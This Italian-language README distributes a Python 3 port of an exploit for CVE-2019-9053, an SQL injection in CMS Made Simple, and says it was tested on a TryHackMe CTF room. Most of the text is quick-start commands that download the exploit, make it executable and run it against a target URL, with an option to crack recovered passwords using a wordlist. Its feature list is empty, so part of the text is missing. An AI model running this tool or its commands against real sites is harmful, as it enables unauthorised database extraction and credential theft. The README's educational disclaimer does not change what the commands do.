
CVE-2019-9053.
Questa è una porta in Python 3 dell'exploit per CVE-2019-9053, che colpisce CMS Made Simple (CMSMS) versioni precedenti alla 2.2.10. La vulnerabilità consente l'iniezione SQL tramite l'interfaccia del modulo News.
Testato sulla TryHackMe Simple CTF Challenge.

L'exploit sfrutta una vulnerabilità di iniezione SQL nel modulo News di CMS Made Simple. Può:
Scarica ed esegui rapidamente usando questi comandi:
# Scarica l'exploit
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py
# Scarica i requisiti
curl -O https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt
# Installa i requisiti
pip install -r requirements.txt
# Rendi eseguibile l'exploit
chmod +x exploit.py
# Esegui l'exploit
./exploit.py -u http://target.com/cms
Alternativa usando wget:
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/exploit.py
wget https://raw.githubusercontent.com/del0x3/CVE-2019-9053-port-py3/main/requirements.txt
pip install -r requirements.txt
chmod +x exploit.py
./exploit.py -u http://target.com/cms
git clone https://github.com/del0x3/CVE-2019-9053-port-py3.git
cd CVE-2019-9053-port-py3
pip install -r requirements.txt
Utilizzo base:
python3 exploit.py -u http://target.com/cms
Con cracking della password:
python3 exploit.py -u http://target.com/cms -c -w /path/to/wordlist.txt
-u, --url: URL di destinazione base (obbligatorio)-w, --wordlist: Percorso della wordlist per il cracking della password-c, --crack: Abilita la modalità di cracking della passwordQuesto strumento è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. Non usarlo contro sistemi senza un'autorizzazione esplicita.
Licenza MIT